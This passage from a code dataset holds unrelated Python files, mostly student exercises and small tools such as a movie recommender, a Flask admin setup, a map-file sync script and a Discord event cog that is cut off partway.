\"Evaluaciones Realizadas\", category=\"Evaluacion\"))\n admin.add_view(ModelView(Topico, \"Topicos\", category=\"Evaluacion\"))\n admin.add_view(ModelView(Prueba, \"Pruebas\", category=\"Evaluacion\"))\n admin.add_view(ModelView(Colegio, \"Colegios\"))\n admin.add_view(ModelView(Alerta, \"Alertas\"))\n admin.add_view(ModelView(Observacion, \"Observaciones Alumnos\",category=\"Observaciones\"))\n admin.add_view(ModelView(ObservacionProfesor, \"Observaciones Profesor\",category=\"Observaciones\"))\n admin.add_view(ModelView(Evento, \"Eventos\",category=\"Eventos\"))\n admin.add_view(ModelView(Asistencia, \"Asistencias\", category=\"Asistencia y justificaciones\"))\n admin.add_view(ModelView(Justificacion, \"Justificaciones\", category=\"Asistencia y justificaciones\"))\n admin.add_view(ModelView(Archivo,\"Archivos\"))\n admin.add_view(ModelView(Video,\"Videos\"))\n admin.add_view(ViewWithMethodViews(\"Importador\"))\n\nadd_views(admin)\n\nif __name__ == '__main__':\n app.run(host=app.config.get('HOST', '127.0.0.1'),\n port=app.config.get('PORT', 4000))","sub_path":"admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":8012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"528319557","text":"import pandas as pd\r\nimport warnings;warnings.filterwarnings('ignore')\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.metrics.pairwise import cosine_similarity\r\nfrom konlpy.tag import *\r\nimport numpy as np\r\nimport json\r\n\r\ndef preprocess(text):\r\n okt = Okt()\r\n stop_words = ['은', '는', '이', '가', '을', '를', '좀', '잘', '그', '되다', '의', '이다',\r\n '과', '도', '없다', '으로', '수', '에', '와', '한', '하다', '들', '의']\r\n token_str = ''\r\n text = okt.morphs(text, stem=True)\r\n # 각 줄거리를 어간 추출한 후 접미사, 접속사, 동사 제거 후 공백으로 이어 붙임\r\n for token in text:\r\n if token not in stop_words:\r\n token_str += ' ' + token\r\n return token_str\r\n\r\nmovies = pd.read_csv('contentlast.csv', encoding='cp949')\r\nmovies_df = movies[['movie_name', 'movie_content', 'url']].fillna('') #결측행 제거\r\n\r\nmovies_df['content'] = movies_df['movie_content'].apply(lambda x:preprocess(x)) #데이터 전처리\r\n\r\ncount_vect = CountVectorizer(min_df=1, ngram_range=(1,1))\r\n# min_df : 특정 단어가 출현하는 문서의 최소 갯수(줄거리에 1번이라도 등장하면 토큰으로 사용)\r\n# ngram_range : 단어의 묶음을 1개부터 1개까지 설정\r\nmovies_vect = count_vect.fit_transform(movies_df['content']) # BOW 인코딩 벡터 반환\r\n\r\ncosine_sim = cosine_similarity(movies_vect, movies_vect) # 각 벡터들 사이의 코사인 유사도 구함\r\n\r\nindices = pd.Series(movies_df.index, index=movies_df['movie_name'])\r\n\r\ndef recommendation(title, cosine_sim=cosine_sim):\r\n # 전체 영화에 대해 입력한 영화와의 유사도를 구한 후 리스트에 넣음\r\n sim_scores = list(enumerate(cosine_sim[indices[title]]))\r\n # 유사도 내림차순으로 영화 정렬\r\n sim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)\r\n\r\n sim_scores = sim_scores[0:11] # 0번은 자기 자신, 1번부터 10번까지 유사도 높은 영화 10개 가져옴\r\n movie_indices = [i[0] for i in sim_scores] # 10개의 영화들의 인덱스 가져옴\r\n\r\n return movies_df['movie_name'].iloc[movie_indices] # 인덱스로 영화 찾아서 반환\r\n\r\nmovies_name = movies['movie_name'].tolist()\r\nmovie_all = {}\r\nfor x in movies_name:\r\n movie_index = recommendation(x).index\r\n movie_recom = recommendation(x).values\r\n movies_url = movies_df.iloc[movie_index, 2].values\r\n movie_dic = {}\r\n for y in range(11):\r\n movie_dic[movie_recom[y]] = movies_url[y]\r\n movie_all[x] = movie_dic\r\n\r\nwith open('movie_recommendation3.json', 'w', encoding='utf-8') as make_file:\r\n json.dump(movie_all, make_file, ensure_ascii=False, indent=\"\\t\")\r\n\r\n\r\n\r\n","sub_path":"movie_recommendation.py","file_name":"movie_recommendation.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"78161620","text":"import os\nimport sys\nfrom pathutil import *\nfrom parseimage import *\nfrom parsecsd import *\nfrom combine import *\nfrom optparse import OptionParser\n\nif __name__ == \"__main__\":\n usage = \"usage: %prog [options] imgdir csddir outdir\"\n parser = OptionParser(usage=usage)\n parser.add_option(\"-i\", \"--packimage\", \n action=\"store_true\", \n default=False, \n dest=\"bpackimage\", \n help=\"pack image\") \n parser.add_option(\"-c\", \"--parsecsd\", \n action=\"store_true\", \n default=False, \n dest=\"bparsecsd\", \n help=\"parser csd\")\n (options, argv) = parser.parse_args()\n if len(argv) != 3:\n parser.error(\"incorrect args\")\n sys.exit(1)\n imgdir = argv[0]\n csddir = argv[1]\n outdir = argv[2]\n packname = 'ui'+getdirbase(imgdir)\n tmpdir = '__tmp_'+packname\n\n if not os.path.isdir(outdir):\n os.mkdir(outdir)\n if options.bpackimage: \n #if os.path.isdir(tmpdir):\n #rmdirs(tmpdir) \n \n # pack texture dir\n outname = os.path.join(tmpdir, packname)\n packimage(imgdir, outname)\n\n # all png to ppm\n files = list()\n getfiles(tmpdir, [\".png\"], 1, files)\n for f in files:\n png2ppm(f, outdir)\n\n if options.bparsecsd:\n # parse json\n img_l = list()\n files = list()\n getfiles(tmpdir, [\".json\"], 1, files)\n for f in files:\n img_l += parsejson(f, len(img_l))\n startid = len(img_l)\n # parse csd\n csd_l = list()\n files = list()\n getfiles(csddir, [\".csd\"], 1, files)\n for f in files:\n c = parsecsd(f, startid, img_l)\n csd_l.append(c)\n startid += len(c['l']) \n combine(csd_l, img_l, outdir, packname) \n","sub_path":"tool/uipack/uipack.py","file_name":"uipack.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"63726897","text":"\"\"\"\n2) Escribir una función recursiva que reciba una lista y un parámetro n, y devuelva otra\nlista con los elementos de la lista replicados esa cantidad n de veces.\nPor ejemplo, replicar ([1, 3, 3, 7], 2) debe devolver ([1, 1, 3, 3, 3, 3, 7, 7])\n\"\"\"\n\n\ndef replicar(lista, n):\n \"\"\"\n Recibe una lista y la cantidad de veces que debe replicarse cada elemento\n :param lista: lista de elementos iguales\n :param n: entero positivo\n :return: nueva lista con elementos replicados n veces\n \"\"\"\n nueva_lista = []\n\n if len(lista) < 1:\n return nueva_lista\n\n for i in range(n):\n nueva_lista.append(lista[0])\n\n return nueva_lista + replicar(lista[1:], n)\n\n\n# ejecucion\nlista1 = [1, 3, 3, 7]\nlista2 = replicar(lista1, 2)\nprint(lista1)\nprint(lista2)","sub_path":"Parcialitos/Cuarto/ejercicio2.py","file_name":"ejercicio2.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"288300716","text":"game_dictionary = {\n \"home\": {\n \"team_name\":\"Brooklyn Nets\",\n \"colors\": [\"Black\", \"White\"],\n \"players\": {\n \"Alan Anderson\": {\n \"number\":0,\n \"shoe\":16,\n \"points\":22,\n \"rebounds\":12,\n \"assists\":12,\n \"steals\":3,\n \"blocks\":1,\n \"slam_dunks\":1\n },\n \"Reggie Evans\": {\n \"number\":30,\n \"shoe\":14,\n \"points\":12,\n \"rebounds\":12,\n \"assists\":12,\n \"steals\":12,\n \"blocks\":12,\n \"slam_dunks\":7\n },\n \"Brook Lopez\": {\n \"number\":11,\n \"shoe\":17,\n \"points\":17,\n \"rebounds\":19,\n \"assists\":10,\n \"steals\":3,\n \"blocks\":1,\n \"slam_dunks\":15\n },\n \"Mason Plumlee\": {\n \"number\":1,\n \"shoe\":19,\n \"points\":26,\n \"rebounds\":12,\n \"assists\":6,\n \"steals\":3,\n \"blocks\":8,\n \"slam_dunks\":5\n },\n \"Jason Terry\": {\n \"number\":31,\n \"shoe\":15,\n \"points\":19,\n \"rebounds\":2,\n \"assists\":2,\n \"steals\":4,\n \"blocks\":11,\n \"slam_dunks\":1\n }\n }\n },\n \"away\": {\n \"team_name\":\"Charlotte Hornets\",\n \"colors\":[\"Turquoise\",\"Purple\"],\n \"players\": {\n \"Jeff Adrian\": {\n \"number\":4,\n \"shoe\":18,\n \"points\":10,\n \"rebounds\":1,\n \"assists\":1,\n \"steals\":2,\n \"blocks\":7,\n \"slam_dunks\":2\n },\n \"Bismak Biyombo\": {\n \"number\":0,\n \"shoe\":16,\n \"points\":12,\n \"rebounds\":4,\n \"assists\":7,\n \"steals\":7,\n \"blocks\":15,\n \"slam_dunks\":10\n },\n \"DaSagna Diop\": {\n \"number\":2,\n \"shoe\":14,\n \"points\":24,\n \"rebounds\":12,\n \"assists\":12,\n \"steals\":4,\n \"blocks\":5,\n \"slam_dunks\":5\n },\n \"Ben Gordon\": {\n \"number\":8,\n \"shoe\":15,\n \"points\":33,\n \"rebounds\":3,\n \"assists\":2,\n \"steals\":1,\n \"blocks\":1,\n \"slam_dunks\":0\n },\n \"Brendan Haywood\": {\n \"number\":33,\n \"shoe\":15,\n \"points\":6,\n \"rebounds\":12,\n \"assists\":12,\n \"steals\":22,\n \"blocks\":5,\n \"slam_dunks\":12\n }\n }\n }\n}\n\n\ndef game_dict():\n return game_dictionary\n\ndef find_player_stat(name,stat):\n for team, values in game_dict().items():\n if name in game_dict()[team]['players'].keys():\n return game_dict()[team]['players'][name][stat]\n return None\n\ndef find_team_stat(name,stat):\n for team, values in game_dict().items():\n if name == game_dict()[team]['team_name']:\n return game_dict()[team][stat]\n return None\n\ndef num_points_scored(name):\n return find_player_stat(name,'points')\n\nprint(num_points_scored('Ben Gordon'))\n\ndef shoe_size(name):\n return find_player_stat(name,'shoe')\nprint(shoe_size('Brendan Haywood'))\n\ndef team_colors(name):\n return find_team_stat(name,'colors')\nprint(team_colors('Brooklyn Nets'))\n\ndef team_names():\n team_name=[game_dict()[team]['team_name'] for team in game_dict()]\n return team_name\nprint(team_names())\n\ndef player_numbers(team_name):\n numbers = [ game_dict()[team]['players'][player]['number'] for team in game_dict() for player in game_dict()[team]['players'] if game_dict()[team]['team_name']==team_name]\n return numbers\nprint(player_numbers('Brooklyn Nets'))\n\ndef player_stats(name):\n for team in game_dict():\n if name in game_dict()[team]['players'].keys():\n return game_dict()[team]['players'][name]\n return None\nprint (player_stats('Jeff Adrian'))\n\ndef big_shoe_rebounds():\n max=0\n big_shoe=[]\n rebounds=0\n for team in game_dict():\n for player in game_dict()[team]['players']:\n if game_dict()[team]['players'][player]['shoe']>max:\n big_shoe=[player]\n max=game_dict()[team]['players'][player]['shoe']\n rebound=game_dict()[team]['players'][player]['rebounds']\n elif game_dict()[team]['players'][player]['shoe']==max:\n big_shoe.append(player)\n return rebound\nprint(big_shoe_rebounds())\n\ndef most_points_scored():\n max=0\n MVP=[]\n for team in game_dict():\n for player in game_dict()[team]['players']:\n if game_dict()[team]['players'][player]['points']>max:\n MVP=[player]\n max=game_dict()[team]['players'][player]['points']\n elif game_dict()[team]['players'][player]['points']==max:\n MVP.append(player)\n return MVP\nprint(most_points_scored())\n\ndef winning_team():\n max=0\n winner=[]\n for team, values in game_dict().items():\n score=0\n for player in game_dict()[team]['players']:\n score+=game_dict()[team]['players'][player]['points']\n if score>max:\n winner=game_dict()[team]['team_name']\n max=score\n elif score==max:\n winner.append(game_dict()[team]['team_name'])\n return winner\nprint(winning_team())\n\ndef player_with_longest_name():\n max=0\n longest=[]\n for team in game_dict():\n for player in game_dict()[team]['players']:\n if len(player)>max:\n longest=[player]\n max=len(player)\n elif len(player)==max:\n longest.append(player)\n return longest\nprint(player_with_longest_name())\n\ndef long_name_steals_a_ton():\n max = find_player_stat(player_with_longest_name()[0],'steals')\n for team in game_dict():\n for player in game_dict()[team]['players']:\n if game_dict()[team]['players'][player]['steals']>max:\n return False\n return True\nprint(long_name_steals_a_ton())\n\ndef good_practices():\n for location, team_stats in game_dict().items():\n # are you ABSOLUTELY SURE what 'location' and 'team_stats' are? use pdb.set_trace() to find out!\n import pdb; pdb.set_trace()\n for stats, data in team_stats.items():\n # are you ABSOLUTELY SURE what 'stats' and 'data' are? use pdb.set_trace() to find out!\n import pdb; pdb.set_trace()\n # what is 'data' at each level of the for loop block? when will we be able to iterate through a list?\n # When would the following line of code break?\n for item in data:\n print(item)\n","sub_path":"dictionaryballBonus.py","file_name":"dictionaryballBonus.py","file_ext":"py","file_size_in_byte":7180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"464339321","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\n# 第一行注释是为了告诉Linux/OS X系统,这是一个Python可执行程序,Windows系统会忽略这个注释;\r\n# 第二行注释是为了告诉Python解释器,按照UTF-8编码读取源代码,否则,你在源代码中写的中文输出可能会有乱码。\r\n\r\n#整型,浮点型,字符型,布尔,空值(None)\r\n\r\n#字符串\r\nprint(\"I'm Carlos!\") #引号重复\r\nprint('I\\'m \\\"Carlos\\\"') #转义\r\nprint('\\\\ \\nIm \\tcarlos') #\\n换行 \\t制表符\r\nprint(r'\\\\\\\\t\\\\n\\\\') #r''内部的字符串默认不转义\r\nprint('''line1\r\nline2\r\nline3''') #'''...'''多行输出\r\n# True False and or not \r\n# None是python里一种特殊的空值 没有意义的 不能理解为0\r\n# 常量表示不能改变的量 一般用全部大写字母表示\r\nPI = 3.14159265359\r\n# 精确除法 \r\n10 / 3\r\n# 地板除法 取整\r\n10 // 3\r\n# 取余数\r\n10 % 3\r\n# 用ord()函数获取字符的证书表示\r\nord('A')\r\nord('中')\r\n# 用chr()函数把字符整数表示为对应的字符\r\nchr(66)\r\nchr(25991)\r\n\r\n# 用b''或者b\"\"表示bytes类型数据\r\nx = b'ABC'\r\n\r\n# 以Unicode表示的str通过encode()方法可以编码为指定的bytes\r\n'ABC'.encode('ascii')\r\n'中文'.encode('utf-8')\r\n\r\n# 要把bytes变为str,就需要用decode()方法\r\nb'ABC'.decode('ascii')\r\nb'\\xe4\\xb8\\xad\\xe6\\x96\\x87'.decode('utf-8')\r\n# 如果bytes中只有一小部分无效的字节,可以传入errors='ignore'忽略错误的字节\r\nb'\\xe4\\xb8\\xad\\xff'.decode('utf-8', errors='ignore')\r\n# 要计算str包含多少个字符,可以用len()函数\r\nlen('zhongwen')\r\nlen('中文')\r\n\r\n# %运算符就是用来格式化字符串的。在字符串内部,%s表示用字符串替换,%d表示用整数替换\r\n# ,有几个%?占位符,后面就跟几个变量或者值,顺序要对应好。如果只有一个%?,括号可以省略\r\n# ,字符串里面的%是一个普通字符怎么办?这个时候就需要转义,用%%来表示一个%:\r\n'Hello, %s' % 'world'\r\n'Hi, %s, you have $%d.' % ('Michael', 1000000)\r\n'growth rate: %d %%' % 7\r\n \r\n# 另一种格式化字符串的方法是使用字符串的format()方法,它会用传入的参数依次替换字符串内的占位符{0}、{1}……,\r\n'Hello, {0}, 成绩提升了 {1:.1f}%'.format('小明', 17.125)\r\n\r\n# list Python内置的一种数据类型是列表:list。list是一种有序的集合,可以随时添加和删除其中的元素。\r\nclassmates = ['Michael', 'Bob', 'Tracy']\r\n\r\n# dict 字典\r\nd = {'michael':95,'bob':56,'tom0':23}\r\nd['michael']\r\n# 通过key值设置字典值 一个key值只能设置一个value值后面的会覆盖前面的值 没有key值取值时会报错 \r\nd['abel'] = 54\r\nd['abel']\r\n\r\n# 要判断key值是否存在有两个方式\r\n# 1.用in来判断key是否存在\r\n# 2.用dict提供的get()方法 如果key不存在会返回None 返回None的时候交互环境不返回结果 或者返回指定的值\r\n'thomas' in d # False\r\nd.get('thomas')\r\nd.get('thomas',-1)\r\n\r\n# 删除一个key用pop(key)方法对应的value也会从dict中删除\r\nd.pop('bob') # 56\r\nd \r\n\r\n# dict是用空间换时间的一种处理方式\r\n\r\n# set 一组key的集合 key不能重复 创建一个key需要提供一个list作为输入集合\r\ns = set([1,2,3])\r\ns # {1,2,3}\r\n\r\n# 通过add(key)方法可以添加元素到set中\r\ns.add(4)\r\n# 通过remove(key)方法可以添加元素到set中\r\ns.remove(4)\r\n\r\n#set可以看成数学意义上的无序和无重复元素的集合,因此,两个set可以做数学意义上的交集、并集等操作\r\ns1 = set([1,2,3])\r\ns1 = set([4,2,3])\r\ns1 & s2 # {2,3}\r\ns1 | s2 # {1,2,3,4}\r\n# set与dict的唯一区别仅仅在于没有存储对应的value.\r\n\r\n","sub_path":"variable.py","file_name":"variable.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"332034354","text":"from tkinter import *\n\njanela = Tk()\njanela.title(\"Widget Entry\")\n\ndef btEntry():\n lb2['text'] = ed.get()\n\nlb = Label(janela,text=\"Insira seu nome\")\nlb.place(x=100,y=70)\n\nlb2 = Label(janela,text=\"\")\nlb2.place(x=100,y=170)\n\nbt = Button(janela,text=\"Confirmar\",command=btEntry)\nbt.place(x=100,y=130)\n\ned = Entry(janela)\ned.place(x=100,y=100)\n\n\njanela.geometry(\"300x300+300+300\")\njanela.mainloop()\n","sub_path":"PythonTKinter/WidgetEntry.py","file_name":"WidgetEntry.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"150001690","text":"from PyQt5 import QtGui\nfrom PyQt5 import QtWidgets\nimport os, sys, shutil, re\n\ngeopackage_name = \"RoadDB.gpkg\"\nmap_name = \"Roadway.qgs\"\n\nnetwork_dir = os.path.join(\"F:\", os.sep, \"ROADWAY\", \"WCarey\", \"GIS\")\nlocal_pkg_dir = os.path.join(os.path.expanduser(\"~\"), \"MY Documents\", \"QGIS-Local\")\n\ndef read_file(file):\n f = open(file, \"r\")\n content = f.read()\n f.close()\n\n if content == '':\n result = 0\n else:\n result = float(content)\n return result\n\ndef create_or_update_file(file, value):\n f = open(file, \"w+\")\n f.write(str(value))\n f.close()\n return\n\ndef is_newer_package_avialable(local_file, network_file):\n verson_file = re.sub(r\"\\.\\D+\", \".ver\", local_file)\n if not os.path.exists(verson_file):\n create_or_update_file(verson_file, 0)\n\n local_date = read_file(verson_file)\n network_file_date = os.path.getmtime(network_file)\n if local_date < network_file_date:\n return True\n else:\n return False\n\ndef update_local_verson(local_file, network_file):\n verson_file = re.sub(r\"\\.\\D+\", \".ver\", local_file)\n network_file_date = os.path.getmtime(network_file)\n create_or_update_file(verson_file, network_file_date)\n return\n\ndef update_local(filename):\n network_file = os.path.join(network_dir, filename)\n local_file = os.path.join(local_pkg_dir, filename)\n\n\n if os.path.exists(network_file):\n if is_newer_package_avialable(local_file, network_file):\n if filename == map_name:\n reply = QtWidgets.QMessageBox.question(None, \"Update?\", 'A new verson of the map document was found. Do you wish to update? \\nWarning: This will overwrite your local prefrences but give you access to new layers.', QtWidgets.QMessageBox.Yes, QtWidgets.QMessageBox.No)\n else:\n reply = QtWidgets.QMessageBox.Yes\n if reply == QtWidgets.QMessageBox.Yes:\n update_local_verson(local_file, network_file)\n try:\n os.remove(local_file)\n except FileNotFoundError:\n pass\n except:\n print('Unable to remove old local file. Please close all other QGIS instances.')\n shutil.copy2(network_file, local_file)\n #else:\n #QtWidgets.QMessageBox.information(None, \"INFO\", 'You have the newest verson of '+ filename +' already.')\n \n else:\n QtWidgets.QMessageBox.information(None, \"INFO\", 'Unable to find ' + filename + ' on the network, using local one for now. \\nQGIS will check next time you start the program. \\nIf this problem persists, please contact Will Carey.')\n\n\nif not os.path.exists(local_pkg_dir):\n os.mkdir(local_pkg_dir)\n\nupdate_local(geopackage_name)\nupdate_local(map_name)\n","sub_path":"network/startup.py","file_name":"startup.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"284407775","text":"\"\"\"\nSearch Insert Position\n\nGiven a sorted array and a target value, return the index if the target is found. If not, return the index where it would be if it were inserted in order.\n\nYou may assume no duplicates in the array.\n\nHere are few examples.\n[1,3,5,6], 5 --> 2\n[1,3,5,6], 2 --> 1\n[1,3,5,6], 7 --> 4\n[1,3,5,6], 0 --> 0\n\nSubscribe to see which companies asked this question\n\nHide Tags Array Binary Search\nHide Similar Problems (E) First Bad Version\n\n\n\"\"\"\n\nimport unittest\n\n\nclass Solution(object):\n def searchInsert(self, nums, target): #52ms, 65.72%\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: int\n \"\"\"\n if nums is None or len(nums) == 0:\n return 0\n left = 0\n right = len(nums) - 1\n while 0<=left<=right nums[mid]:\n left = mid + 1\n else:\n right = mid - 1\n mid = (left+right) / 2 + 1\n return mid\n\n\n\nclass SolutionTester(unittest.TestCase):\n def setUp(self):\n self.sol = Solution()\n\n def test_case1(self):\n nums = [1,3,5,6]\n target = 5\n answer = 2\n result = self.sol.searchInsert(nums, target)\n self.assertEqual(answer, result)\n\n def test_case2(self):\n nums = [1, 3, 5, 6]\n target = 2\n answer = 1\n result = self.sol.searchInsert(nums, target)\n self.assertEqual(answer, result)\n\n def test_case3(self):\n nums = [1,3,5,6]\n target = 7\n answer = 4\n result = self.sol.searchInsert(nums, target)\n self.assertEqual(answer, result)\n\n def test_case4(self):\n nums = [1,3,5,6]\n target = -1\n answer = 0\n result = self.sol.searchInsert(nums, target)\n self.assertEqual(answer, result)\n\ndef main():\n suite = unittest.TestLoader().loadTestsFromTestCase(SolutionTester)\n unittest.TextTestRunner(verbosity=2).run(suite)\n\nif __name__ == \"__main__\":\n main()","sub_path":"misc/search_insert _position.py","file_name":"search_insert _position.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"241463081","text":"#10 - Faça um Programa para leitura de três notas parciais de um aluno. O programa deve calcular a média alcançada por aluno e presentar:\n#- A mensagem \"Aprovado\", se a média for maior ou igual a 7, com a respectiva média alcançada;\n#- A mensagem \"Reprovado\", se a média for menor do que 7, com a respectiva média alcançada;\n#- A mensagem \"Aprovado com Distinção\", se a média for igual a 10.\n\nnota1 = float(input(\"Digite a primeira nota: \"))\nnota2 = float(input(\"Digite a segunda nota: \"))\nsoma = (nota1 + nota2) /2\nif soma >= 7 and soma < 10:\n print(\"Aprovado\")\nelif soma == 10:\n print(\"Aprovado com Distinção\")\nelse:\n print(\"Reprovado\")\n \nif soma <= 10:\n media = int(input(\"Deseja ver a média? (1)-Sim (2)-Não: \"))\n if media == 1:\n print(\"Sua média é:\", soma)\n elif media == 2:\n print(\"programa encerrado\")\n else:\n print(\"Error\")\nelse:\n print(\"Ops, operação inválida\")\n\n","sub_path":"questao10_lista4_média.py","file_name":"questao10_lista4_média.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"70091663","text":"import random\ndef judge(number):\n while not number.isdigit():\n print(\"请输入一个[1,100]范围的整数 invalid literal for int() with 10:'%s'\" % number)\n number = input(\"您猜的数是?\")\n num = int(number)\n if (num<0) or (num>100):\n print(\"请输入一个[1,100]范围的整数\")\n number = input(\"您猜的数是?\")\n judge(number)\n return num\nT = \"Y\"\nwhile T == \"Y\" or T == \"y\":\n num = random.randint(1,100)\n for i in range(0,5):\n if i != 4:\n count = str(6-i)\n number = input(\"您猜的数是?\")\n number = judge(number)\n if number == num:\n print(\"您猜对了\")\n break\n else:\n if number > num:\n print(\"您猜的数太大了!\")\n else:\n print(\"您猜的数太小了!\")\n else:\n print (\"您已经猜了4次,要猜的数字是:\",num)\n break\n T = input(\"继续猜数字游戏请输入y/Y,输入其它任意键退出:\")\n","sub_path":"project10/project/18301030025.py","file_name":"18301030025.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"511476449","text":"#Try and Except---------------------------------\n# Chapter 6.6\n#\n# print(\"NO ERROR HANDLING-------------------------\")\n# fn = int(input(\"what's your favorite number? \"))\n#\n# #what could go wrong?\n# #\n# print(\"WHILE LOOP--------------------------------\")\nfn = input(\"what's your favorite number? \")\nwhile not fn.isnumeric():\n fn = input(\"what's your favorite number? \")\nfn = int(fn)\n#\n# # #how have we fixed it in the past?\n# #\n# #try/Except\n# print(\"TRY EXCEPT #1--------------------------------\")\n# try:\n# fn = int(input(\"what's your favorite number? \"))\n# except:\n# print(\"That's not a number, I'll pretend you said 7.\")\n# fn = 7\n#\n# # #or\n# print(\"TRY EXCEPT #2--------------------------------\")\n# while True:\n# try:\n# fn = int(input(\"what's your favorite number? \"))\n# break\n# except:\n# print(\"That's not a number\")\n\n#\n# print(\"\\n\\nFILE ISSUES-----------------------------------\")\n#reader = open(\"Chelsea.txt\", \"r\")\n# #what can go wrong?\n#\n# try:\n# filename = input(\"filename: \")\n# reader = open(filename, \"r\")\n# except:\n# print(\"YOU MESSED UP. GO CHECK YOUR FILE LOCATION.\")\n\n# while True:\n# try:\n# filename = input(\"filename: \")\n# reader = open(filename, \"r\")\n# break\n# except:\n# print(\"YOU MESSED UP. GO CHECK YOUR FILE LOCATION.\")\n\n#\n#\n#List Comprehension\n# Chapter 7.11\n# a = [\"A\",\"B\",\"C\",\"D\",\"E\"]\n#\n# b = []\n# for i in a:\n# b.append(i.lower())\n# print(b)\n#\n# b2 = [i.lower() for i in a]\n# print(b2)\n# b2 = [i.lower() for i in a]\n# print(b2)\n#\nc = [\"The quick brown fox A\", \"Mary had a little lamb\", \"New in Town\"]\nvows = []\nfor s in c:\n for letter in s:\n if letter.lower() in \"aeiou\":\n vows.append(letter)\n\nprint(vows)\nvows2 = [letter for s in c for letter in s if letter.lower() in \"aeiou\"]\nprint(vows2)\n\n\n\n\n\n\n# vows2= [letter for s in c for letter in s if letter.lower() in \"aeiou\"]\n# print(vows2)\n#\n#\n#Classes\n# Chapter 11 (all)\nclass Cat:\n def __init__(self,name):\n self.name = name\n print(\"MEOW, I'm \", self.name)\n def meow(self):\n print(self.name + \": MEOW!\")\nBlake = Cat(\"Blake\")\nJohn = Cat(\"John\")\nBlake.meow()\n#Functions\n# Chapters 5 and 8\n","sub_path":"InClass/Review.py","file_name":"Review.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"173677242","text":"import turtle;\n\ndef draw_squre(some_turtle) :\n for i in range(1, 5) :\n some_turtle.forward(100);\n some_turtle.right(90);\n\n\ndef draw_art() :\n window = turtle.Screen();\n window.bgcolor(\"red\");\n\n turtle1 = turtle.Turtle();\n turtle1.shape(\"turtle\");\n turtle1.color(\"yellow\");\n turtle1.speed(2);\n for i in range(1, 37):\n draw_squre(turtle1);\n turtle1.right(10);\n\n\n\n\n\n\n window.exitonclick();\n\n\n\n\n\n\ndraw_art();","sub_path":"pythonCrashcourseExerciseAnswer/myPythonStudy/draw_python.py","file_name":"draw_python.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"355491413","text":"import discord\nimport logging\n\nfrom typing import Union, Optional\n\nfrom redbot.core import commands, checks, Config, VersionInfo, version_info\nfrom redbot.core.utils.predicates import ReactionPredicate\nfrom redbot.core.utils.menus import start_adding_reactions\nfrom redbot.core.utils.chat_formatting import pagify, humanize_list\n\nfrom .event_obj import Event, ValidImage\n\nlog = logging.getLogger(\"red.trusty-cogs.EventPoster\")\n\nEVENT_EMOJIS = [\n \"\\N{WHITE HEAVY CHECK MARK}\",\n \"\\N{NEGATIVE SQUARED CROSS MARK}\",\n \"\\N{WHITE QUESTION MARK ORNAMENT}\",\n]\n\n\nclass EventPoster(commands.Cog):\n \"\"\"Create admin approved events/announcements\"\"\"\n\n __version__ = \"1.5.9\"\n __author__ = \"TrustyJAID\"\n\n def __init__(self, bot):\n self.bot = bot\n self.config = Config.get_conf(self, identifier=144014746356678656)\n default_guild = {\n \"approval_channel\": None,\n \"announcement_channel\": None,\n \"ping\": \"\",\n \"events\": {},\n \"custom_links\": {},\n \"default_max\": None,\n \"auto_end_events\": False,\n }\n default_user = {\"player_class\": \"\"}\n self.config.register_guild(**default_guild)\n self.config.register_member(**default_user)\n self.event_cache = {}\n self.bot.loop.create_task(self.initialize())\n\n def format_help_for_context(self, ctx: commands.Context):\n \"\"\"\n Thanks Sinbad!\n \"\"\"\n pre_processed = super().format_help_for_context(ctx)\n return f\"{pre_processed}\\n\\nCog Version: {self.__version__}\"\n\n async def initialize(self) -> None:\n if version_info >= VersionInfo.from_str(\"3.2.0\"):\n await self.bot.wait_until_red_ready()\n else:\n await self.bot.wait_until_ready()\n try:\n for guild_id in await self.config.all_guilds():\n guild = self.bot.get_guild(int(guild_id))\n if guild_id not in self.event_cache:\n self.event_cache[guild_id] = {}\n if guild is None:\n continue\n data = await self.config.guild(guild).events()\n for user_id, event_data in data.items():\n try:\n event = await Event.from_json(event_data, guild)\n except (TypeError, KeyError, discord.errors.Forbidden):\n log.error(\"Error loading events\", exc_info=True)\n continue\n if event is None:\n return\n self.event_cache[guild_id][event.message.id] = event\n except Exception as e:\n log.error(\"Error loading events\", exc_info=e)\n\n @commands.Cog.listener()\n async def on_raw_reaction_add(self, payload: discord.RawReactionActionEvent) -> None:\n \"\"\"\n Checks for reactions to the event\n \"\"\"\n if str(payload.emoji) not in EVENT_EMOJIS:\n # log.debug(\"Not a valid yes or no emoji\")\n return\n if payload.guild_id not in self.event_cache:\n return\n if payload.message_id not in self.event_cache[payload.guild_id]:\n 